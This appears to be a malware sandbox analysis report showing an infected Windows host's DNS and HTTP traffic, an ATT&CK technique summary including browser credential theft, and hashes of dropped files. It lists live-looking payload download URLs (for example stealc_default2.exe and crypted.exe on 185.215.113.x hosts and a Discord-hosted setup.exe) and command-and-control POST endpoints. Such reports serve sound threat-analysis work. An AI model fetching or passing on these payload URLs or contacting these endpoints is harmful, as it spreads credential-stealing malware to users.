Set-Cookie: __cf_bm=dSDzMXUdQ0.y_NepSq_vKdqankWxaH.GQjfJRqZ4I.M-1726462932-1.0.1.1-zD5MUAgGjf1QGJg_NTi4PQHzw4866KuLWsGRnRssJG20nr_29vlFuAhnNQhg_J4tKgjXVld3l8W_SukBmxQl1A; path=/; expires=Mon, 16-Sep-24 05:32:12 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiMiN4LY06bToEIxs8OsAnDIitljhneJMXJPmqguAGE1%2B8E6I6rNP2yIcpLIx9oihv1d2MIeqkcGu7Xr7cqYxikdHtFj45HLPAqwoxkOuwviTwlM67%2BCSdOEC2zqsF3xQhTOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=znOLqr7bW2yzgDDtucQkgZpfvt5K5Js5smF.27aYN2w-1726462932303-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
-
Remote address:8.8.8.8:53RequestHAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkibIN AResponse
-
Remote address:188.225.44.114:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary48577504
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 24106
Host: fivevd5vs.top
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:13 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:8.8.8.8:53Requestconditionprovice.proIN AResponseconditionprovice.proIN A81.19.139.138
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzU2MDc=
Host: 185.215.113.19
Content-Length: 75759
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestservice-domain.xyzIN AResponseservice-domain.xyzIN A54.210.117.250
-
Remote address:8.8.8.8:53Requestc.pki.googIN AResponsec.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.227
-
Remote address:142.250.179.227:80RequestGET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 16 Sep 2024 04:37:43 GMT
Expires: Mon, 16 Sep 2024 05:27:43 GMT
Cache-Control: public, max-age=3000
Age: 1588
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requesto.pki.googIN AResponseo.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.227
-
GEThttp://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3DMjytQiW.exeRemote address:142.250.179.227:80RequestGET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
ResponseHTTP/1.1 200 OK
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 16 Sep 2024 04:20:07 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2644
-
GEThttp://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3DMjytQiW.exeRemote address:142.250.179.227:80RequestGET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
ResponseHTTP/1.1 200 OK
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 16 Sep 2024 04:38:28 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 1544
-
GEThttp://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoXMjytQiW.exeRemote address:142.250.179.227:80RequestGET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
ResponseHTTP/1.1 200 OK
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 16 Sep 2024 04:08:53 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3319
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A216.58.204.78
-
GEThttps://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCRMjytQiW.exeRemote address:216.58.204.78:443RequestGET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Sep 2024 05:04:12 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestclients2.googleusercontent.comIN AResponseclients2.googleusercontent.comIN CNAMEgooglehosted.l.googleusercontent.comgooglehosted.l.googleusercontent.comIN A142.250.200.1
-
GEThttps://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxMjytQiW.exeRemote address:142.250.200.1:443RequestGET /crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
ResponseHTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: AD-8ljvlqL7qAMgKPTnepQPyOZ3etfzI19Rjc9PZvJXEFGuj1_BSTU9jPYopGB6epH8EYMNEGi1vsxTcOg
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 15 Sep 2024 11:25:22 GMT
Expires: Mon, 15 Sep 2025 11:25:22 GMT
Cache-Control: public, max-age=31536000
Age: 63530
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestapi4.check-data.xyzIN AResponseapi4.check-data.xyzIN CNAMEcheckdata-1114476139.us-west-2.elb.amazonaws.comcheckdata-1114476139.us-west-2.elb.amazonaws.comIN A44.236.110.137checkdata-1114476139.us-west-2.elb.amazonaws.comIN A35.160.60.134
-
Remote address:44.236.110.137:80RequestPOST /api2/google_api_ifi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
Host: api4.check-data.xyz
Content-Length: 728
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Mon, 16 Sep 2024 05:01:01 GMT
Server: nginx
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
Content-Length: 0
Connection: keep-alive
-
Remote address:185.215.113.26:80RequestPOST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:04:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.26:80RequestPOST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:04:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:05:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:05:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:05:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:05:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.19:80RequestPOST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODg1MzQ=
Host: 185.215.113.19
Content-Length: 88686
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:05:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
101.7kB 4.9MB 2053 3498
HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/inc/crypteda.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/inc/stealc_default2.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/inc/penis.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/inc/bundle.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/dobre/acentric.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/inc/2.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/dobre/splwow64.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200 -
118.6kB 5.1MB 2346 3631
HTTP Request
GET http://185.215.113.117/inc/gold.exeHTTP Response
200HTTP Request
GET http://185.215.113.117/inc/needmoney.exeHTTP Response
200HTTP Request
GET http://185.215.113.117/inc/crypted.exeHTTP Response
200 -
912.7kB 23.4kB 685 346
-
466.1kB 15.2kB 361 160
-
9.7kB 439.0kB 202 318
HTTP Request
GET http://185.215.113.26/Nework.exeHTTP Response
200 -
1.1kB 667 B 13 6
HTTP Request
POST http://185.215.113.26/Dem7kTu/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.26/Dem7kTu/index.phpHTTP Response
200 -
465.3kB 18.6kB 373 132
-
185.7kB 5.4MB 3012 3906
HTTP Request
GET http://185.215.113.17/HTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dllHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dllHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dllHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/nss3.dllHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dllHTTP Response
200HTTP Request
GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200HTTP Request
POST http://185.215.113.17/2fb6c2cc8dce150a.phpHTTP Response
200 -
125.2kB 6.9MB 2672 4931
HTTP Request
GET http://103.130.147.211/Files/2.exeHTTP Response
200 -
727 B 625 B 5 5
HTTP Request
GET http://91.202.233.158/HTTP Response
200HTTP Request
POST http://91.202.233.158/e96ea2db21fa9a1b.phpHTTP Response
200 -
901.4kB 22.1kB 680 315
-
463.7kB 29.6kB 373 168
-
1.0kB 381 B 6 4
HTTP Request
POST http://fivevd5vs.top/v1/upload.phpHTTP Response
200 -
75.9kB 1.7kB 59 37
HTTP Request
POST http://fivevd5vs.top/v1/upload.phpHTTP Response
200 -
152 B 40 B 3 1
-
370 B 1.8kB 7 6
HTTP Request
GET http://194.58.114.223/d/385121HTTP Response
302 -
162.159.129.233:443https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&tls, httpaxplong.exe324.5kB 8.8MB 5034 6323
HTTP Request
GET https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&HTTP Response
200 -
33.8kB 897 B 29 16
HTTP Request
POST http://fivevd5vs.top/v1/upload.phpHTTP Response
200 -
392 B 219 B 5 5
-
152 B 120 B 3 3
-
320.9kB 37.1kB 5387 767
HTTP Request
POST http://185.215.113.19/CoreOPT/index.php?scr=1HTTP Response
200 -
1.3kB 667 B 14 6
HTTP Request
POST http://185.215.113.19/CoreOPT/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.19/CoreOPT/index.phpHTTP Response
200 -
152 B 40 B 3 1
-
152 B 40 B 3 1
-
152 B 40 B 3 1
-
152 B 40 B 3 1
-
152 B 40 B 3 1
-
399 B 219 B 5 5
-
532 B 219 B 6 5
-
288 B 219 B 5 5
-
190 B 92 B 4 2
-
152 B 40 B 3 1
-
348 B 1.7kB 5 4
HTTP Request
GET http://c.pki.goog/r/r1.crlHTTP Response
200 -
142.250.179.227:80http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoXhttpMjytQiW.exe1.3kB 4.6kB 12 8
HTTP Request
GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3DHTTP Response
200HTTP Request
GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3DHTTP Response
200HTTP Request
GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoXHTTP Response
200 -
216.58.204.78:443https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCRtls, httpMjytQiW.exe1.1kB 8.6kB 10 12
HTTP Request
GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCRHTTP Response
302 -
142.250.200.1:443https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxtls, httpMjytQiW.exe1.6kB 37.8kB 20 31
HTTP Request
GET https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxHTTP Response
200 -
1.2kB 536 B 4 3
HTTP Request
POST http://api4.check-data.xyz/api2/google_api_ifiHTTP Response
200 -
152 B 3
-
734 B 667 B 6 6
HTTP Request
POST http://185.215.113.26/Dem7kTu/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.26/Dem7kTu/index.phpHTTP Response
200 -
152 B 3
-
736 B 627 B 6 5
HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200 -
152 B 40 B 3 1
-
385.6kB 69.2kB 6728 1378
HTTP Request
POST http://185.215.113.19/CoreOPT/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.19/CoreOPT/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.19/CoreOPT/index.php?scr=1HTTP Response
200 -
152 B 40 B 3 1
-
152 B 80 B 3 2
-
152 B 120 B 3 3
-
52 B 1
-
59 B 75 B 1 1
DNS Request
fivevd5vs.top
DNS Response
188.225.44.114
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.129.233162.159.130.233162.159.133.233162.159.135.233162.159.134.233
-
89 B 164 B 1 1
DNS Request
HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
-
66 B 82 B 1 1
DNS Request
conditionprovice.pro
DNS Response
81.19.139.138
-
64 B 80 B 1 1
DNS Request
service-domain.xyz
DNS Response
54.210.117.250
-
56 B 107 B 1 1
DNS Request
c.pki.goog
DNS Response
142.250.179.227
-
56 B 107 B 1 1
DNS Request
o.pki.goog
DNS Response
142.250.179.227
-
65 B 105 B 1 1
DNS Request
clients2.google.com
DNS Response
216.58.204.78
-
76 B 121 B 1 1
DNS Request
clients2.googleusercontent.com
DNS Response
142.250.200.1
-
65 B 159 B 1 1
DNS Request
api4.check-data.xyz
DNS Response
44.236.110.13735.160.60.134
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indirect Command Execution
1Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD5e7b7584155841546526f216d7ba6b11b
SHA10a219012114a89469d22550996df4171cc803273
SHA256f412bc7d4cdd70c8416d2a578eab2bd1ac0174bfee0d83ebe5a5fd6611057aa8
SHA5126cf84ed712d9a961b5f8d8ccb24ff98ea1b330a8051edea63423fe30fc3a763ec2366c8713c1290c94c54eb680cdf61e8fe9c25d8c5cb4d1606c8664fc2ca7c2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e99b116681e16b943265fce8331600f6
SHA16b670111f45c6d8a3e7bc121c189476c69d2ac6b
SHA256cd67ae8387fd39ae28f082ad7187a389ae92b94d497f5467ae32cb919b980f6b
SHA512694f4d826abeb987d44a583582f487c2810d58a20387649e66819c4318d65ccef6f1270eb8b3716f5aeba3d08ffa0d592ca9c73502b480785251b7550c6270d5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD547688680ef2b6fd0d559811894aff2e8
SHA168355eb5891675432674b5c0a31525e38325713f
SHA256ca1f3ff9e3b756b7a717a764d003b8d60ffca58f38fade797d066f85a6f94cbf
SHA51219ba8e11536a76e449e6cfadacb249c6f9df80aa8ff88af47d9b115b2db79f5f0e59dcc8aebfebb26697ab59a09733a56a97d40f4f9e1fd48dc6240e19e9e480
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
